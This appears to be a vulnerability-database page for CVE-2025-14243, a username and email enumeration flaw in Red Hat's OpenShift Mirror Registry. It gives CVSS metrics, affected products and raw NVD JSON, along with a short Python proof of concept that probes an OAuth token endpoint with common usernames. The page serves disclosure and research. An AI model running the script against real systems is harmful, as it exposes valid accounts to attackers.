Security Vulnerability Report
中文
CVE-2025-14243 CVSS 5.3 MEDIUM

CVE-2025-14243

Published: 2026-04-08 17:20:25
Last Modified: 2026-04-21 18:06:15
Source: [email protected]

Description

A flaw was found in the OpenShift Mirror Registry. This vulnerability allows an unauthenticated, remote attacker to enumerate valid usernames and email addresses via different error messages during authentication failures and account creation.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:2.0:*:*:*:*:*:*:* - VULNERABLE
OpenShift Mirror Registry (具体受影响版本请参考RedHat官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target endpoint example (adjust based on actual deployment) target_url = "https://<openshift-registry-host>/oauth/token" usernames = ["admin", "root", "developer", "test", "kubeadmin"] print("[+] Starting User Enumeration for CVE-2025-14243...") for username in usernames: # Payload attempting to authenticate data = { "username": username, "password": "InvalidPassword123!" # Constant invalid password } try: response = requests.post(target_url, data=data, timeout=5) # Logic to differentiate responses based on vulnerability description # Vulnerability: Different messages for auth fail vs user not found if response.status_code == 401 and "password" in response.text.lower(): print(f"[VALID] User found: {username}") elif response.status_code == 404 or "not found" in response.text.lower(): print(f"[INVALID] User not found: {username}") else: print(f"[UNKNOWN] Response for {username}: Status {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Connection error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14243", "sourceIdentifier": "[email protected]", "published": "2026-04-08T17:20:25.247", "lastModified": "2026-04-21T18:06:15.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in the OpenShift Mirror Registry. This vulnerability allows an unauthenticated, remote attacker to enumerate valid usernames and email addresses via different error messages during authentication failures and account creation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:-:*:*:*:*:*:*:*", "matchCriteriaId": "63757310-FC5B-44E6-9211-36269827BC56"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "281E6AA4-1E08-488F-BA7A-F0BE7CF42A5B"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-14243", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2419829", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.